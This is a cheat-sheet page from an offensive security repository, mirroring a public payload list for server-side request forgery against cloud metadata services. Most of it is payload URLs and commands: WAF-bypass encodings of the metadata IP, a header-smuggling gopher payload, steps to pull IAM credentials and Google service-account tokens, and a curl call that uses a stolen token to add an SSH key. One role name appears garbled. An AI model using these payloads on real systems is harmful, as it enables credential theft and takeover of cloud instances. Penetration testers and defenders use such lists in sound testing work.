daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ssrf-cloud-instances.md (12345B)


      1 ---
      2 title: "SSRF URL for Cloud Instances"
      3 topic: "Server Side Request Forgery"
      4 topicSlug: "server-side-request-forgery"
      5 sourcePath: "Server Side Request Forgery/SSRF-Cloud-Instances.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # SSRF URL for Cloud Instances
     12 
     13 > When exploiting Server-Side Request Forgery (SSRF) in cloud environments, attackers often target metadata endpoints to retrieve sensitive instance information (e.g., credentials, configurations). Below is a categorized list of common URLs for various cloud and infrastructure providers
     14 
     15 ## Summary
     16 
     17 * [SSRF URL for AWS Bucket](#ssrf-url-for-aws)
     18 * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
     19 * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
     20 * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)
     21 * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
     22 * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
     23 * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
     24 * [SSRF URL for Azure](#ssrf-url-for-azure)
     25 * [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)
     26 * [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)
     27 * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
     28 * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
     29 * [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
     30 * [SSRF URL for Hetzner Cloud](#ssrf-url-for-hetzner-cloud)
     31 * [SSRF URL for Docker](#ssrf-url-for-docker)
     32 * [SSRF URL for Rancher](#ssrf-url-for-rancher)
     33 * [References](#references)
     34 
     35 ## SSRF URL for AWS
     36 
     37 The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
     38 
     39 * IPv4 endpoint (old): `http://169.254.169.254/latest/meta-data/`
     40 * IPv4 endpoint (new) requires the header `X-aws-ec2-metadata-token`
     41 
     42   ```powershell
     43   export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
     44   curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
     45   ```
     46 
     47 * IPv6 endpoint: `http://[fd00:ec2::254]/latest/meta-data/`
     48 
     49 In case of a WAF, you might want to try different ways to connect to the API.
     50 
     51 * DNS record pointing to the AWS API IP
     52 
     53   ```powershell
     54   http://instance-data
     55   http://169.254.169.254
     56   http://169.254.169.254.nip.io/
     57   ```
     58 
     59 * HTTP redirect
     60 
     61   ```powershell
     62   Static:http://nicob.net/redir6a
     63   Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
     64   ```
     65 
     66 * Encoding the IP to bypass WAF
     67 
     68   ```powershell
     69   http://425.510.425.510 Dotted decimal with overflow
     70   http://2852039166 Dotless decimal
     71   http://7147006462 Dotless decimal with overflow
     72   http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal
     73   http://0xA9FEA9FE Dotless hexadecimal
     74   http://0x41414141A9FEA9FE Dotless hexadecimal with overflow
     75   http://0251.0376.0251.0376 Dotted octal
     76   http://0251.00376.000251.0000376 Dotted octal with padding
     77   http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
     78   http://[::ffff:a9fe:a9fe] IPV6 Compressed
     79   http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
     80   http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
     81   http://[fd00:ec2::254] IPV6
     82   ```
     83 
     84 These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role.
     85 
     86 ```powershell
     87 http://169.254.169.254/latest/meta-data/iam/security-credentials
     88 http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
     89 ```
     90 
     91 This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance.
     92 
     93 ```powershell
     94 http://169.254.169.254/latest/user-data
     95 ```
     96 
     97 Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties.
     98 
     99 ```powershell
    100 http://169.254.169.254/latest/meta-data/
    101 http://169.254.169.254/latest/meta-data/ami-id
    102 http://169.254.169.254/latest/meta-data/reservation-id
    103 http://169.254.169.254/latest/meta-data/hostname
    104 http://169.254.169.254/latest/meta-data/public-keys/
    105 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
    106 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
    107 http://169.254.169.254/latest/dynamic/instance-identity/document
    108 ```
    109 
    110 **Examples**:
    111 
    112 * Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
    113 * *Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
    114 
    115 ## SSRF URL for AWS ECS
    116 
    117 If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.
    118 
    119 ```powershell
    120 curl http://169.254.170.2/v2/credentials/<UUID>
    121 ```
    122 
    123 This way you'll extract IAM keys of the attached role
    124 
    125 ## SSRF URL for AWS Elastic Beanstalk
    126 
    127 We retrieve the `accountId` and `region` from the API.
    128 
    129 ```powershell
    130 http://169.254.169.254/latest/dynamic/instance-identity/document
    131 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
    132 ```
    133 
    134 We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.
    135 
    136 ```powershell
    137 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
    138 ```
    139 
    140 Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
    141 
    142 ## SSRF URL for AWS Lambda
    143 
    144 AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.
    145 
    146 ```powershell
    147 http://localhost:9001/2018-06-01/runtime/invocation/next
    148 http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next
    149 ```
    150 
    151 Docs: <https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next>
    152 
    153 ## SSRF URL for Google Cloud
    154 
    155 :warning: Google is shutting down support for usage of the **v1 metadata service** on January 15.
    156 
    157 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
    158 
    159 ```powershell
    160 http://169.254.169.254/computeMetadata/v1/
    161 http://metadata.google.internal/computeMetadata/v1/
    162 http://metadata/computeMetadata/v1/
    163 http://metadata.google.internal/computeMetadata/v1/instance/hostname
    164 http://metadata.google.internal/computeMetadata/v1/instance/id
    165 http://metadata.google.internal/computeMetadata/v1/project/project-id
    166 ```
    167 
    168 Google allows recursive pulls
    169 
    170 ```powershell
    171 http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
    172 ```
    173 
    174 Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
    175 
    176 ```powershell
    177 http://metadata.google.internal/computeMetadata/v1beta1/
    178 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
    179 ```
    180 
    181 Required headers can be set using a gopher SSRF with the following technique
    182 
    183 ```powershell
    184 gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
    185 ```
    186 
    187 Interesting files to pull out:
    188 
    189 * SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
    190 * Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
    191 * Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
    192 
    193 ### Add an SSH key
    194 
    195 Extract the token
    196 
    197 ```powershell
    198 http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
    199 ```
    200 
    201 Check the scope of the token
    202 
    203 ```powershell
    204 $ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA  
    205 
    206 { 
    207         "issued_to": "101302079XXXXX", 
    208         "audience": "10130207XXXXX", 
    209         "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring", 
    210         "expires_in": 2443, 
    211         "access_type": "offline" 
    212 }
    213 ```
    214 
    215 Now push the SSH key.
    216 
    217 ```powershell
    218 curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata" 
    219 -H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA" 
    220 -H "Content-Type: application/json" 
    221 --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
    222 ```
    223 
    224 ## SSRF URL for Digital Ocean
    225 
    226 Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
    227 
    228 ```powershell
    229 curl http://169.254.169.254/metadata/v1/id
    230 http://169.254.169.254/metadata/v1.json
    231 http://169.254.169.254/metadata/v1/ 
    232 http://169.254.169.254/metadata/v1/id
    233 http://169.254.169.254/metadata/v1/user-data
    234 http://169.254.169.254/metadata/v1/hostname
    235 http://169.254.169.254/metadata/v1/region
    236 http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
    237 
    238 All in one request:
    239 curl http://169.254.169.254/metadata/v1.json | jq
    240 ```
    241 
    242 ## SSRF URL for Packetcloud
    243 
    244 Documentation available at `https://metadata.packet.net/userdata`
    245 
    246 ## SSRF URL for Azure
    247 
    248 Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
    249 
    250 ```powershell
    251 http://169.254.169.254/metadata/v1/maintenance
    252 ```
    253 
    254 Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
    255 
    256 ```powershell
    257 http://169.254.169.254/metadata/instance?api-version=2017-04-02
    258 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
    259 ```
    260 
    261 ## SSRF URL for OpenStack/RackSpace
    262 
    263 (header required? unknown)
    264 
    265 ```powershell
    266 http://169.254.169.254/openstack
    267 ```
    268 
    269 ## SSRF URL for HP Helion
    270 
    271 (header required? unknown)
    272 
    273 ```powershell
    274 http://169.254.169.254/2009-04-04/meta-data/ 
    275 ```
    276 
    277 ## SSRF URL for Oracle Cloud
    278 
    279 ```powershell
    280 http://192.0.0.192/latest/
    281 http://192.0.0.192/latest/user-data/
    282 http://192.0.0.192/latest/meta-data/
    283 http://192.0.0.192/latest/attributes/
    284 ```
    285 
    286 ## SSRF URL for Alibaba
    287 
    288 ```powershell
    289 http://100.100.100.200/latest/meta-data/
    290 http://100.100.100.200/latest/meta-data/instance-id
    291 http://100.100.100.200/latest/meta-data/image-id
    292 ```
    293 
    294 ## SSRF URL for Hetzner Cloud
    295 
    296 ```powershell
    297 http://169.254.169.254/hetzner/v1/metadata
    298 http://169.254.169.254/hetzner/v1/metadata/hostname
    299 http://169.254.169.254/hetzner/v1/metadata/instance-id
    300 http://169.254.169.254/hetzner/v1/metadata/public-ipv4
    301 http://169.254.169.254/hetzner/v1/metadata/private-networks
    302 http://169.254.169.254/hetzner/v1/metadata/availability-zone
    303 http://169.254.169.254/hetzner/v1/metadata/region
    304 ```
    305 
    306 ## SSRF URL for Kubernetes ETCD
    307 
    308 Can contain API keys and internal ip and ports
    309 
    310 ```powershell
    311 curl -L http://127.0.0.1:2379/version
    312 curl http://127.0.0.1:2379/v2/keys/?recursive=true
    313 ```
    314 
    315 ## SSRF URL for Docker
    316 
    317 ```powershell
    318 http://127.0.0.1:2375/v1.24/containers/json
    319 
    320 Simple example
    321 docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
    322 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
    323 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
    324 ```
    325 
    326 More info:
    327 
    328 * Daemon socket option: <https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option>
    329 * Docker Engine API: <https://docs.docker.com/engine/api/latest/>
    330 
    331 ## SSRF URL for Rancher
    332 
    333 ```powershell
    334 curl http://rancher-metadata/<version>/<path>
    335 ```
    336 
    337 More info: <https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/>
    338 
    339 ## References
    340 
    341 * [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - December 13, 2017](https://web.archive.org/web/20180210093624/https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
    342 * [Exploiting SSRF in AWS Elastic Beanstalk - Sunil Yadav - February 1, 2019](https://web.archive.org/web/20251113080112/https://notsosecure.com/exploiting-ssrf-aws-elastic-beanstalk)